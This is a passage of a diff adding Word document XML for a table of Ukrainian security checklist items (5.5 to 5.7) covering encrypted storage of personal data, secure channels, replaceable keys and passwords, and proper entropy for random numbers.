+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>тому</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, що життєвий цикл</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ключів</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> дотримува</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>єтться</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> належним чином.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.5</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Персональні дані повинні зберіга</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">ються в зашифрованому вигляді. </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>П</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ереконайтеся, що зв'язок йде через захищені канали.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.6</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконайтеся в тому, що всі ключі і паролі можуть бути зам</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>інені, і генеруються або замінюються</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> під час установки.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.7</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконайтеся в тому, що випадкові числа створюються при правильній ентропії, навіть якщо додаток знаходиться під великим навантаженням.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
